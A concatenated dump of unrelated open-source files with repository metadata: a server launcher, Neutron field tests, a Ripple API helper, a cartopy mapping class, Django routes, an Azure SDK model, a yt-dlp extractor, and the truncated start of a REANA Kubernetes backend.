1e003bde5323325aaab9b72912481661808fc33b
|
[
"MIT"
] | 1
|
2020-05-14T00:32:44.000Z
|
2020-05-14T00:32:44.000Z
|
main.py
|
guard-project/lcp
|
1e003bde5323325aaab9b72912481661808fc33b
|
[
"MIT"
] | 6
|
2020-10-30T12:08:16.000Z
|
2021-07-04T14:21:51.000Z
|
main.py
|
guard-project/lcp
|
1e003bde5323325aaab9b72912481661808fc33b
|
[
"MIT"
] | 3
|
2020-11-07T12:45:25.000Z
|
2021-02-10T09:59:52.000Z
|
import os
Import_Error = ImportError
path = os.path.abspath(__file__)
dir_path = os.path.dirname(path)
os.chdir(dir_path)
import waitress # noqa: E402
from rich import pretty, traceback # noqa: E402
from rich.console import Console # noqa: E402
from rich.panel import Panel # noqa: E402
pretty.install()
traceback.install(show_locals=False)
from about import project, title, version # noqa: E402
from api import api # noqa: E402
from reader.arg import ArgReader # noqa: E402
from utils.log import Log # noqa: E402
db = ArgReader.read()
if db.version is not None:
print(db.version)
else:
ident = f'{project} - {title} v:{version}'
console = Console()
console.print(Panel.fit(ident))
Log.init(config=db.log_config)
api_instance = api(title=title, version=version)
Log.get('api').success(f'Accept requests at {db.host}:{db.port}')
waitress.serve(api_instance, host=db.host, port=db.port,
expose_tracebacks=False, ident=ident, _quiet=True)
| 29.441176
| 69
| 0.712288
|
44d43b16fd6b9b02b6cc3ebc93a719bad47192f1
| 9,670
|
py
|
Python
|
neutron/tests/unit/objects/test_common_types.py
|
brandonlogan/neutron
|
57364544aa8b0e7cd9d73550f287bcad574ba08c
|
[
"Apache-2.0"
] | null | null | null |
neutron/tests/unit/objects/test_common_types.py
|
brandonlogan/neutron
|
57364544aa8b0e7cd9d73550f287bcad574ba08c
|
[
"Apache-2.0"
] | null | null | null |
neutron/tests/unit/objects/test_common_types.py
|
brandonlogan/neutron
|
57364544aa8b0e7cd9d73550f287bcad574ba08c
|
[
"Apache-2.0"
] | null | null | null |
# Copyright 2016 OpenStack Foundation
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import abc
import itertools
import random
from neutron_lib import constants as const
from neutron.common import constants
from neutron.extensions import dns as dns_ext
from neutron.objects import common_types
from neutron.tests import base as test_base
from neutron.tests import tools
class TestField(object):
def test_coerce_good_values(self):
for in_val, out_val in self.coerce_good_values:
self.assertEqual(out_val, self.field.coerce('obj', 'attr', in_val))
def test_coerce_bad_values(self):
for in_val in self.coerce_bad_values:
self.assertRaises((TypeError, ValueError),
self.field.coerce, 'obj', 'attr', in_val)
def test_to_primitive(self):
for in_val, prim_val in self.to_primitive_values:
self.assertEqual(prim_val, self.field.to_primitive('obj', 'attr',
in_val))
def test_from_primitive(self):
class ObjectLikeThing(object):
_context = 'context'
for prim_val, out_val in self.from_primitive_values:
self.assertEqual(out_val, self.field.from_primitive(
ObjectLikeThing, 'attr', prim_val))
@abc.abstractmethod
def test_stringify(self):
'''This test should validate stringify() format for new field types.'''
class IPV6ModeEnumFieldTest(test_base.BaseTestCase, TestField):
def setUp(self):
super(IPV6ModeEnumFieldTest, self).setUp()
self.field = common_types.IPV6ModeEnumField()
self.coerce_good_values = [(mode, mode)
for mode in const.IPV6_MODES]
self.coerce_bad_values = ['6', 4, 'type', 'slaacc']
self.to_primitive_values = self.coerce_good_values
self.from_primitive_values = self.coerce_good_values
def test_stringify(self):
for in_val, out_val in self.coerce_good_values:
self.assertEqual("'%s'" % in_val, self.field.stringify(in_val))
class DscpMarkFieldTest(test_base.BaseTestCase, TestField):
def setUp(self):
super(DscpMarkFieldTest, self).setUp()
self.field = common_types.DscpMarkField()
self.coerce_good_values = [(val, val)
for val in constants.VALID_DSCP_MARKS]
self.coerce_bad_values = ['6', 'str', [], {}, object()]
self.to_primitive_values = self.coerce_good_values
self.from_primitive_values = self.coerce_good_values
def test_stringify(self):
for in_val, out_val in self.coerce_good_values:
self.assertEqual("%s" % in_val, self.field.stringify(in_val))
class IPNetworkPrefixLenFieldTest(test_base.BaseTestCase, TestField):
def setUp(self):
super(IPNetworkPrefixLenFieldTest, self).setUp()
self.field = common_types.IPNetworkPrefixLenField()
self.coerce_good_values = [(x, x) for x in (0, 32, 128, 42)]
self.coerce_bad_values = ['len', '1', 129, -1]
self.to_primitive_values = self.coerce_good_values
self.from_primitive_values = self.coerce_good_values
def test_stringify(self):
for in_val, out_val in self.coerce_good_values:
self.assertEqual("%s" % in_val, self.field.stringify(in_val))
class MACAddressFieldTest(test_base.BaseTestCase, TestField):
def setUp(self):
super(MACAddressFieldTest, self).setUp()
self.field = common_types.MACAddressField()
mac1 = tools.get_random_EUI()
mac2 = tools.get_random_EUI()
self.coerce_good_values = [(mac1, mac1), (mac2, mac2)]
self.coerce_bad_values = [
'XXXX', 'ypp', 'g3:vvv',
# the field type is strict and does not allow to pass strings, even
# if they represent a valid MAC address
tools.get_random_mac(),
]
self.to_primitive_values = self.coerce_good_values
self.from_primitive_values = self.coerce_good_values
def test_stringify(self):
for in_val, out_val in self.coerce_good_values:
self.assertEqual('%s' % in_val, self.field.stringify(in_val))
class IPNetworkFieldTest(test_base.BaseTestCase, TestField):
def setUp(self):
super(IPNetworkFieldTest, self).setUp()
self.field = common_types.IPNetworkField()
addrs = [
tools.get_random_ip_network(version=ip_version)
for ip_version in constants.IP_ALLOWED_VERSIONS
]
self.coerce_good_values = [(addr, addr) for addr in addrs]
self.coerce_bad_values = [
'ypp', 'g3:vvv',
# the field type is strict and does not allow to pass strings, even
# if they represent a valid IP network
'10.0.0.0/24',
]
self.to_primitive_values = self.coerce_good_values
self.from_primitive_values = self.coerce_good_values
def test_stringify(self):
for in_val, out_val in self.coerce_good_values:
self.assertEqual('%s' % in_val, self.field.stringify(in_val))
class IPVersionEnumFieldTest(test_base.BaseTestCase, TestField):
def setUp(self):
super(IPVersionEnumFieldTest, self).setUp()
self.field = common_types.IPVersionEnumField()
self.coerce_good_values = [(val, val)
for val in constants.IP_ALLOWED_VERSIONS]
self.coerce_bad_values = [5, 0, -1, 'str']
self.to_primitive_values = self.coerce_good_values
self.from_primitive_values = self.coerce_good_values
def test_stringify(self):
for in_val, out_val in self.coerce_good_values:
self.assertEqual("%s" % in_val, self.field.stringify(in_val))
class FlowDirectionEnumFieldTest(test_base.BaseTestCase, TestField):
def setUp(self):
super(FlowDirectionEnumFieldTest, self).setUp()
self.field = common_types.FlowDirectionEnumField()
self.coerce_good_values = [(val, val)
for val in constants.VALID_DIRECTIONS]
self.coerce_bad_values = ['test', '8', 10, []]
self.to_primitive_values = self.coerce_good_values
self.from_primitive_values = self.coerce_good_values
def test_stringify(self):
for in_val, out_val in self.coerce_good_values:
self.assertEqual("'%s'" % in_val, self.field.stringify(in_val))
class DomainNameFieldTest(test_base.BaseTestCase, TestField):
def setUp(self):
super(DomainNameFieldTest, self).setUp()
self.field = common_types.DomainNameField()
self.coerce_good_values = [
(val, val)
for val in ('www.google.com', 'hostname', '1abc.com')
]
self.coerce_bad_values = ['x' * (dns_ext.FQDN_MAX_LEN + 1), 10, []]
self.to_primitive_values = self.coerce_good_values
self.from_primitive_values = self.coerce_good_values
def test_stringify(self):
for in_val, out_val in self.coerce_good_values:
self.assertEqual("'%s'" % in_val, self.field.stringify(in_val))
class EtherTypeEnumFieldTest(test_base.BaseTestCase, TestField):
def setUp(self):
super(EtherTypeEnumFieldTest, self).setUp()
self.field = common_types.EtherTypeEnumField()
self.coerce_good_values = [(val, val)
for val in constants.VALID_ETHERTYPES]
self.coerce_bad_values = ['IpV4', 8, 'str', 'ipv6']
self.to_primitive_values = self.coerce_good_values
self.from_primitive_values = self.coerce_good_values
def test_stringify(self):
for in_val, out_val in self.coerce_good_values:
self.assertEqual("'%s'" % in_val, self.field.stringify(in_val))
class IpProtocolEnumFieldTest(test_base.BaseTestCase, TestField):
def setUp(self):
super(IpProtocolEnumFieldTest, self).setUp()
self.field = common_types.IpProtocolEnumField()
self.coerce_good_values = [
(val, val)
for val in itertools.chain(
const.IP_PROTOCOL_MAP.keys(),
[str(v) for v in const.IP_PROTOCOL_MAP.values()]
)
]
self.coerce_bad_values = ['test', 'Udp', 256]
try:
# pick a random protocol number that is not in the map of supported
# protocols
self.coerce_bad_values.append(
str(
random.choice(
list(
set(range(256)) -
set(const.IP_PROTOCOL_MAP.values())
)
)
)
)
except IndexError:
# stay paranoid and guard against the impossible future when all
# protocols are in the map
pass
self.to_primitive_values = self.coerce_good_values
self.from_primitive_values = self.coerce_good_values
def test_stringify(self):
for in_val, out_val in self.coerce_good_values:
self.assertEqual("'%s'" % in_val, self.field.stringify(in_val))
| 40.124481
| 79
| 0.646329
|
1a9c2c04bf12b2920e934f51b349c02c17433afc
| 408
|
py
|
Python
|
pyripple/__init__.py
|
nkgilley/python-ripple-api
|
180af1cee5f7a71e6ee0c0e854ff21c77bed5704
|
[
"MIT"
] | 1
|
2017-07-05T08:56:27.000Z
|
2017-07-05T08:56:27.000Z
|
pyripple/__init__.py
|
nkgilley/python-ripple-api
|
180af1cee5f7a71e6ee0c0e854ff21c77bed5704
|
[
"MIT"
] | null | null | null |
pyripple/__init__.py
|
nkgilley/python-ripple-api
|
180af1cee5f7a71e6ee0c0e854ff21c77bed5704
|
[
"MIT"
] | null | null | null |
"""Python API for using ripple.com."""
import requests
BASE_URL = 'https://data.ripple.com/v2/accounts/'
def get_balance(address):
req_url = BASE_URL + address + '/balances'
response = requests.get(req_url)
if response.status_code == 200 and response.json().get('result'):
if response.json().get('result') == 'success':
return float(response.json()['balances'][0]['value'])
| 34
| 69
| 0.656863
|
98eb7edeb67ec2b893c06821d9b57395d56cfe2c
| 11,192
|
py
|
Python
|
main/ncmagics/worldmap.py
|
RyosukeDTomita/gcmPlot
|
430f8af353daf464b5c5566f1c163d5bef63f584
|
[
"MIT"
] | null | null | null |
main/ncmagics/worldmap.py
|
RyosukeDTomita/gcmPlot
|
430f8af353daf464b5c5566f1c163d5bef63f584
|
[
"MIT"
] | null | null | null |
main/ncmagics/worldmap.py
|
RyosukeDTomita/gcmPlot
|
430f8af353daf464b5c5566f1c163d5bef63f584
|
[
"MIT"
] | null | null | null |
# coding: utf-8
"""
Name: japanmap.py
Plot japan map using cartopy.
Usage: This is the module.
Author: Ryosuke Tomita
Date: 2021/09/08
"""
from typing import Union
import matplotlib.pyplot as plt
import matplotlib.ticker as mticker
from matplotlib.colors import ListedColormap, LinearSegmentedColormap
from matplotlib.colors import Normalize
import numpy as np
import cartopy.crs as ccrs
import cartopy.feature as cfea
from cartopy.mpl.ticker import LatitudeFormatter, LongitudeFormatter
class WorldMap:
"""JpMap.
Make map near japan.
"""
def __init__(self, color=False):
"""__init__.
Args:
color:
"""
self.fig = plt.figure(figsize=(36, 24), facecolor='w')
self.ax = self.fig.add_subplot(1, 1, 1,
projection=ccrs.PlateCarree(central_longitude=0.0))
#self.ax = self.fig.add_subplot(1, 1, 1,
# projection=ccrs.NorthPolarStereo(central_longitude=-180))
#self.ax = self.fig.add_subplot(1, 1, 1,
# projection=ccrs.Mollweide(central_longitude=0.0))
self.ax.set_global()
self.ax.coastlines(lw=2.5) # coastline thickness
# using axis lat,lon format
dlon, dlat = 20, 20 # grid line interval.
xticks = np.arange(-180, 180.1, dlon)
yticks = np.arange(-90, 90.1, dlat)
self.ax.set_xticks(xticks, crs=ccrs.PlateCarree())
self.ax.set_yticks(yticks, crs=ccrs.PlateCarree())
latfmt = LatitudeFormatter() # axis = degree
lonfmt = LongitudeFormatter(
zero_direction_label=True) # No NS mark 0 degree
self.ax.xaxis.set_major_formatter(lonfmt)
self.ax.yaxis.set_major_formatter(latfmt)
self.ax.axes.tick_params(labelsize=34)
#self.ax.rcParams['font.size'] = 36
# land color,ocean color
if color:
#self.ax.add_feature(cfea.LAND, color='#98fb98')
#self.ax.add_feature(cfea.OCEAN, color='#87cefa')
self.ax.add_feature(cfea.LAND, color='#f5deb3')
self.ax.add_feature(cfea.OCEAN, color='#afeeee')
# grid setting
grid = self.ax.gridlines(crs=ccrs.PlateCarree(),
draw_labels=False,
linewidth=1,
alpha=0.7,
color='k',)
grid.xlocator = mticker.FixedLocator(xticks)
grid.ylocator = mticker.FixedLocator(yticks)
self.color_list = ['#0000ff', '#00ffff', '#008000', '#adff2f',
'#ffff00', '#ffd700', '#ffa500', '#ff0000',
'#c71585', '#ff1493', '#9400d3', '#00ced1',
'#556b2f', '#deb887', '#daa520', '#8b4513',
'#4b0082', '#ffffff',
]
self.plt_cnt = 0
def plot_data(self, x, y, label: str, line=True):
"""plot_data.
plot location data. plot type is dot.
Args:
x:
y:
label (str): label
cnst_marker
"""
plt.rcParams['font.size'] = 36 # label font size
if line:
linewidth = 4
linestyle = "solid"
else:
#no line
linewidth = 0
linestyle = None
self.ax.plot(x, y, 'bo',
label=label,
markersize=15,
color=self.color_list[self.plt_cnt],
markeredgewidth=1.6,
markeredgecolor='#000000',
linestyle=linestyle,
linewidth=linewidth,)
self.plt_cnt += 1
def plot_value(self, x, y, z):
"""plot_value.
plot z value on japan map. x, y are location data.
Args:
x:
y:
z:
"""
for i in range(len(x)):
self.ax.plot(x[i], y[i], marker=str(f'${z[i]:.2f}$'), markersize=90, color='k')
def plot_prmsl_circle(self, x, y, z):
"""plot_value.
plot z value on japan map. x, y are location data.
Args:
x:
y:
z:
"""
for i in range(len(x)):
scale = (1030 - z[i]) // 3
self.ax.plot(x[i], y[i], 'bo',
markersize=15+scale,
color=self.color_list[self.plt_cnt-1],
markeredgewidth=1.6,
markeredgecolor='#000000',)
def contour_plot(self, x, y, z, contour_type=None):
"""contour_plot.
Args:
x:
y:
z:
"""
X, Y = np.meshgrid(x, y)
if contour_type == "pressure":
contour = self.ax.contour(X, Y, z, colors="black",
levels=list(range(900, 1040, 4)),
linewidths=3.0,)
else:
contour = self.ax.contour(X, Y, z,
colors="black",
linewidths=3.0)
self.ax.clabel(contour, fontsize=36, fmt='%1.1f')
def color_line(self, x, y, z, line_value: Union[int, float], color="blue"):
"""color_line.
Args:
x:
y:
z:
line_value (Union[int, float]): line_value
color:
"""
X, Y = np.meshgrid(x, y)
contour = self.ax.contour(X, Y, z,
colors=color,
levels=[line_value],
linewidths=10.0,
linestyles='dashed')
self.ax.clabel(contour, fontsize=48, fmt='%1.1f')
def shade_plot(self, x, y, z, label: str, color_bar_label_min="", color_bar_label_max="", color_map_type="kishotyo"):
"""shade_plot.
make color map.
Args:
x:
y:
z:
label (str): label
color_bar_label_min:
color_bar_label_max:
"""
def _get_jmacmap():
"""_get_jmacmap.
"""
jmacolors=np.array([
[242, 242, 242, 1], # white
[160, 210, 255, 1], # light blue
[33, 140, 255, 1], # aqua
[0, 65, 255, 1], # blue
[250, 245, 0, 1], # yellow
[255, 153, 0, 1], # orange
[255, 40, 0, 1], # red
[180, 0, 104, 1]], # dark red
dtype=np.float)
jmacolors[:,:3] /= 256
jmacmap=LinearSegmentedColormap.from_list("jmacmap2",colors=jmacolors)
return jmacmap
def _get_tempcmap():
"""_get_tempcmap.
"""
tempcolors=np.array([
[160, 0, 200, 1], # puple
[0, 65, 255, 1], # blue
[33, 140, 255, 1], # aqua
[160, 210, 255, 1], # light blue
[250, 245, 180, 1], # white
[250, 245, 0, 1], # yellow
[255, 153, 0, 1], # orange
[255, 40, 0, 1], # red
[180, 0, 104, 1]] # dark red
,dtype=np.float)
tempcolors[:,:3] /= 256
tempcmap=LinearSegmentedColormap.from_list("tempcmap",colors=tempcolors)
return tempcmap
# initial setting of shade
plt.rcParams['font.size'] = 36
X, Y = np.meshgrid(x, y)
if color_map_type == "diff":
color_map = "RdBu_r"
elif color_map_type == "temperature":
color_map = _get_tempcmap()
else:
color_map = _get_jmacmap()
# auto color bar range(using for test).
if color_bar_label_min == "" and color_bar_label_max == "":
shade = self.ax.pcolormesh(X, Y, z, cmap=color_map)
color_bar = plt.colorbar(shade, orientation="vertical", shrink=0.7)
#color bar max min are assigned.
else:
shade = self.ax.pcolormesh(X, Y, z, cmap=color_map,
norm=Normalize(vmin=color_bar_label_min, vmax=color_bar_label_max))
shade.set_clim(color_bar_label_min, color_bar_label_max) #color bar range.
color_bar = plt.colorbar(shade, orientation="vertical", shrink=0.7)
color_bar.set_label(label, fontsize=36,)
def _skip_value(self, array, len_x: int, len_y: int, vector_interval: int):
"""skip_value.
used in vector_plot()
Args:
array:
len_x (int): len_x
len_y (int): len_y
vector_interval (int): vector_interval
"""
skiped_array = [
array[i][j]
for i in range(len_y)
for j in range(len_x)
if i%vector_interval == 0 and j % vector_interval == 0
]
return skiped_array
def vector_plot(self, x, y, u, v, vector_interval: int, vector_scale, mode=None):
"""vector_plot.
make vector map.
use _skip_value()
Args:
x:
y:
u:
v:
vector_interval (int): vector_interval
vector_scale:
"""
u_skipped = self._skip_value(u, len(x), len(y), vector_interval)
v_skipped = self._skip_value(v, len(x), len(y), vector_interval)
x_2d, y_2d = np.meshgrid(x, y)
x_2d_skipped = self._skip_value(x_2d, len(x), len(y), vector_interval)
y_2d_skipped = self._skip_value(y_2d, len(x), len(y), vector_interval)
if mode == "wind":
self.ax.barbs(x_2d_skipped, y_2d_skipped, u_skipped, v_skipped, length=7)
else:
# headlengthがheadaxislengthより大きく設定されると矢印がひし形に近づいていく。
self.ax.quiver(x_2d_skipped, y_2d_skipped, u_skipped, v_skipped, angles='uv',
scale_units='xy', scale=vector_scale,
headwidth=3, headlength=4, headaxislength=3.5)
def hatch_plot(self, x, y, z):
"""hatch_plot.
https://matplotlib.org/stable/gallery/images_contours_and_fields/contourf_hatching.html
Args:
x:
y:
z:
"""
x_2d, y_2d = np.meshgrid(x, y)
self.ax.contourf(x_2d, y_2d, z, hatches='.',cmap='gray', alpha=0.3)
def hatch_plot_2(self, x, y, z):
"""hatch_plot.
Args:
x:
y:
z:
"""
x_2d, y_2d = np.meshgrid(x, y)
self.ax.contourf(x_2d, y_2d, z, hatches='*',cmap='pink', alpha=0.8)
def save_fig(self, outname: str, title=None):
"""save_fig.
save figure.
Args:
outname (str): outname
title (str): title
"""
self.ax.set_title(title, fontsize=32)
bar_, label = self.ax.get_legend_handles_labels()
self.ax.legend(bar_, label, loc='upper left',
borderaxespad=0, bbox_to_anchor=(1.05, 1))
self.fig.savefig(outname, bbox_inches="tight", pad_inches=0.5)
plt.close()
| 33.812689
| 121
| 0.498302
|
347c25efe562e0fa3c64395004c7a36d953a7c9d
| 862
|
py
|
Python
|
onlinecourse/urls.py
|
pavloteyfel/ibm-online-course-app
|
f167839bad82fc270f4a192b94dd38ac7bd287b6
|
[
"Apache-2.0"
] | null | null | null |
onlinecourse/urls.py
|
pavloteyfel/ibm-online-course-app
|
f167839bad82fc270f4a192b94dd38ac7bd287b6
|
[
"Apache-2.0"
] | null | null | null |
onlinecourse/urls.py
|
pavloteyfel/ibm-online-course-app
|
f167839bad82fc270f4a192b94dd38ac7bd287b6
|
[
"Apache-2.0"
] | null | null | null |
from django.conf import settings
from django.conf.urls.static import static
from django.urls import path
from . import views
app_name = "onlinecourse"
urlpatterns = [
path(route="", view=views.CourseListView.as_view(), name="index"),
path("registration/", views.registration_request, name="registration"),
path("login/", views.login_request, name="login"),
path("logout/", views.logout_request, name="logout"),
path("<int:pk>/", views.CourseDetailView.as_view(), name="course_details"),
path("<int:course_id>/enroll/", views.enroll, name="enroll"),
path("<int:course_id>/submit/", views.submit, name="submit"),
path(
"course/<int:course_id>/submission/<int:submission_id>/result/",
views.show_exam_result,
name="show_exam_result",
),
] + static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)
| 39.181818
| 79
| 0.700696
|
493c8d6743bf833fbb115e451642d9eab4bd6de2
| 958
|
py
|
Python
|
sdk/cognitiveservices/azure-cognitiveservices-formrecognizer/azure/cognitiveservices/formrecognizer/models/keys_result_py3.py
|
rsdoherty/azure-sdk-for-python
|
6bba5326677468e6660845a703686327178bb7b1
|
[
"MIT"
] | 2,728
|
2015-01-09T10:19:32.000Z
|
2022-03-31T14:50:33.000Z
|
sdk/cognitiveservices/azure-cognitiveservices-formrecognizer/azure/cognitiveservices/formrecognizer/models/keys_result_py3.py
|
rsdoherty/azure-sdk-for-python
|
6bba5326677468e6660845a703686327178bb7b1
|
[
"MIT"
] | 17,773
|
2015-01-05T15:57:17.000Z
|
2022-03-31T23:50:25.000Z
|
sdk/cognitiveservices/azure-cognitiveservices-formrecognizer/azure/cognitiveservices/formrecognizer/models/keys_result_py3.py
|
rsdoherty/azure-sdk-for-python
|
6bba5326677468e6660845a703686327178bb7b1
|
[
"MIT"
] | 1,916
|
2015-01-19T05:05:41.000Z
|
2022-03-31T19:36:44.000Z
|
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
from msrest.serialization import Model
class KeysResult(Model):
"""Result of an operation to get
the keys extracted by a model.
:param clusters: Object mapping ClusterIds to Key lists.
:type clusters: dict[str, list[str]]
"""
_attribute_map = {
'clusters': {'key': 'clusters', 'type': '{[str]}'},
}
def __init__(self, *, clusters=None, **kwargs) -> None:
super(KeysResult, self).__init__(**kwargs)
self.clusters = clusters
| 31.933333
| 76
| 0.574113
|
1368954bc60e065630359696cf32a7b91d3495c4
| 7,778
|
py
|
Python
|
yt_dlp/extractor/adultswim.py
|
nxtreaming/yt-dlp
|
385ffb467b2285e85a2a5495b90314ba1f8e0700
|
[
"Unlicense"
] | 11
|
2022-01-06T22:09:50.000Z
|
2022-03-12T22:26:22.000Z
|
yt_dlp/extractor/adultswim.py
|
nxtreaming/yt-dlp
|
385ffb467b2285e85a2a5495b90314ba1f8e0700
|
[
"Unlicense"
] | 4
|
2022-02-25T08:20:18.000Z
|
2022-03-17T16:16:20.000Z
|
yt_dlp/extractor/adultswim.py
|
nxtreaming/yt-dlp
|
385ffb467b2285e85a2a5495b90314ba1f8e0700
|
[
"Unlicense"
] | 3
|
2022-02-19T08:59:13.000Z
|
2022-03-06T16:11:21.000Z
|
import json
from .turner import TurnerBaseIE
from ..utils import (
determine_ext,
float_or_none,
int_or_none,
mimetype2ext,
parse_age_limit,
parse_iso8601,
strip_or_none,
try_get,
)
class AdultSwimIE(TurnerBaseIE):
_VALID_URL = r'https?://(?:www\.)?adultswim\.com/videos/(?P<show_path>[^/?#]+)(?:/(?P<episode_path>[^/?#]+))?'
_TESTS = [{
'url': 'http://adultswim.com/videos/rick-and-morty/pilot',
'info_dict': {
'id': 'rQxZvXQ4ROaSOqq-or2Mow',
'ext': 'mp4',
'title': 'Rick and Morty - Pilot',
'description': 'Rick moves in with his daughter\'s family and establishes himself as a bad influence on his grandson, Morty.',
'timestamp': 1543294800,
'upload_date': '20181127',
},
'params': {
# m3u8 download
'skip_download': True,
},
'expected_warnings': ['Unable to download f4m manifest'],
}, {
'url': 'http://www.adultswim.com/videos/tim-and-eric-awesome-show-great-job/dr-steve-brule-for-your-wine/',
'info_dict': {
'id': 'sY3cMUR_TbuE4YmdjzbIcQ',
'ext': 'mp4',
'title': 'Tim and Eric Awesome Show Great Job! - Dr. Steve Brule, For Your Wine',
'description': 'Dr. Brule reports live from Wine Country with a special report on wines. \nWatch Tim and Eric Awesome Show Great Job! episode #20, "Embarrassed" on Adult Swim.',
'upload_date': '20080124',
'timestamp': 1201150800,
},
'params': {
# m3u8 download
'skip_download': True,
},
'skip': '404 Not Found',
}, {
'url': 'http://www.adultswim.com/videos/decker/inside-decker-a-new-hero/',
'info_dict': {
'id': 'I0LQFQkaSUaFp8PnAWHhoQ',
'ext': 'mp4',
'title': 'Decker - Inside Decker: A New Hero',
'description': 'The guys recap the conclusion of the season. They announce a new hero, take a peek into the Victorville Film Archive and welcome back the talented James Dean.',
'timestamp': 1469480460,
'upload_date': '20160725',
},
'params': {
# m3u8 download
'skip_download': True,
},
'expected_warnings': ['Unable to download f4m manifest'],
}, {
'url': 'http://www.adultswim.com/videos/attack-on-titan',
'info_dict': {
'id': 'attack-on-titan',
'title': 'Attack on Titan',
'description': 'md5:41caa9416906d90711e31dc00cb7db7e',
},
'playlist_mincount': 12,
}, {
'url': 'http://www.adultswim.com/videos/streams/williams-stream',
'info_dict': {
'id': 'd8DEBj7QRfetLsRgFnGEyg',
'ext': 'mp4',
'title': r're:^Williams Stream \d{4}-\d{2}-\d{2} \d{2}:\d{2}$',
'description': 'original programming',
},
'params': {
# m3u8 download
'skip_download': True,
},
'skip': '404 Not Found',
}]
def _real_extract(self, url):
show_path, episode_path = self._match_valid_url(url).groups()
display_id = episode_path or show_path
query = '''query {
getShowBySlug(slug:"%s") {
%%s
}
}''' % show_path
if episode_path:
query = query % '''title
getVideoBySlug(slug:"%s") {
_id
auth
description
duration
episodeNumber
launchDate
mediaID
seasonNumber
poster
title
tvRating
}''' % episode_path
['getVideoBySlug']
else:
query = query % '''metaDescription
title
videos(first:1000,sort:["episode_number"]) {
edges {
node {
_id
slug
}
}
}'''
show_data = self._download_json(
'https://www.adultswim.com/api/search', display_id,
data=json.dumps({'query': query}).encode(),
headers={'Content-Type': 'application/json'})['data']['getShowBySlug']
if episode_path:
video_data = show_data['getVideoBySlug']
video_id = video_data['_id']
episode_title = title = video_data['title']
series = show_data.get('title')
if series:
title = '%s - %s' % (series, title)
info = {
'id': video_id,
'title': title,
'description': strip_or_none(video_data.get('description')),
'duration': float_or_none(video_data.get('duration')),
'formats': [],
'subtitles': {},
'age_limit': parse_age_limit(video_data.get('tvRating')),
'thumbnail': video_data.get('poster'),
'timestamp': parse_iso8601(video_data.get('launchDate')),
'series': series,
'season_number': int_or_none(video_data.get('seasonNumber')),
'episode': episode_title,
'episode_number': int_or_none(video_data.get('episodeNumber')),
}
auth = video_data.get('auth')
media_id = video_data.get('mediaID')
if media_id:
info.update(self._extract_ngtv_info(media_id, {
# CDN_TOKEN_APP_ID from:
# https://d2gg02c3xr550i.cloudfront.net/assets/asvp.e9c8bef24322d060ef87.bundle.js
'appId': 'eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJhcHBJZCI6ImFzLXR2ZS1kZXNrdG9wLXB0enQ2bSIsInByb2R1Y3QiOiJ0dmUiLCJuZXR3b3JrIjoiYXMiLCJwbGF0Zm9ybSI6ImRlc2t0b3AiLCJpYXQiOjE1MzI3MDIyNzl9.BzSCk-WYOZ2GMCIaeVb8zWnzhlgnXuJTCu0jGp_VaZE',
}, {
'url': url,
'site_name': 'AdultSwim',
'auth_required': auth,
}))
if not auth:
extract_data = self._download_json(
'https://www.adultswim.com/api/shows/v1/videos/' + video_id,
video_id, query={'fields': 'stream'}, fatal=False) or {}
assets = try_get(extract_data, lambda x: x['data']['video']['stream']['assets'], list) or []
for asset in assets:
asset_url = asset.get('url')
if not asset_url:
continue
ext = determine_ext(asset_url, mimetype2ext(asset.get('mime_type')))
if ext == 'm3u8':
info['formats'].extend(self._extract_m3u8_formats(
asset_url, video_id, 'mp4', m3u8_id='hls', fatal=False))
elif ext == 'f4m':
continue
# info['formats'].extend(self._extract_f4m_formats(
# asset_url, video_id, f4m_id='hds', fatal=False))
elif ext in ('scc', 'ttml', 'vtt'):
info['subtitles'].setdefault('en', []).append({
'url': asset_url,
})
self._sort_formats(info['formats'])
return info
else:
entries = []
for edge in show_data.get('videos', {}).get('edges', []):
video = edge.get('node') or {}
slug = video.get('slug')
if not slug:
continue
entries.append(self.url_result(
'http://adultswim.com/videos/%s/%s' % (show_path, slug),
'AdultSwim', video.get('_id')))
return self.playlist_result(
entries, show_path, show_data.get('title'),
strip_or_none(show_data.get('metaDescription')))
| 39.085427
| 249
| 0.521599
|
c47ce68f5c0901a7506193083fcd50148ff15cf1
| 42,501
|
py
|
Python
|
reana_cluster/backends/kubernetes/k8s.py
|
BenGalewsky/reana-cluster
|
b631360d92886b760d56d47686774537aa4b1db5
|
[
"MIT"
] | 1
|
2019-06-27T01:21:02.000Z
|
2019-06-27T01:21:02.000Z
|
reana_cluster/backends/kubernetes/k8s.py
|
BenGalewsky/reana-cluster
|
b631360d92886b760d56d47686774537aa4b1db5
|
[
"MIT"
] | null | null | null |
reana_cluster/backends/kubernetes/k8s.py
|
BenGalewsky/reana-cluster
|
b631360d92886b760d56d47686774537aa4b1db5
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
#
# This file is part of REANA.
# Copyright (C) 2017, 2018, 2019 CERN.
#
# REANA is free software; you can redistribute it and/or modify it
# under the terms of the MIT License; see LICENSE file for more details.
"""Abstract Base Class representing REANA cluster backend."""
import json
import logging
import os
import shlex
import subprocess
import pkg_resources
import yaml
from jinja2 import (Environment, FileSystemLoader, TemplateNotFound,
TemplateSyntaxError)
from kubernetes import client as k8s_client
from kubernetes import config as k8s_config
from kubernetes.client import Configuration
from kubernetes.client.rest import ApiException
from pkg_resources import parse_version
from reana_cluster import ReanaBackendABC
class KubernetesBackend(ReanaBackendABC):
"""A class for interacting with Kubernetes.
Attributes:
__cluster_type Type of the backend this class implements support for.
_conf Configuration.
"""
__cluster_type = 'Kubernetes'
_conf = {
'templates_folder': pkg_resources.resource_filename(
__name__, '/templates'),
'min_version': 'v1.14.0',
'max_version': 'v1.14.0',
}
def __init__(self,
cluster_spec,
cluster_conf=None,
kubeconfig=None,
kubeconfig_context=None,
cephfs=False,
cephfs_volume_size=None,
cvmfs=False,
debug=False,
url=None):
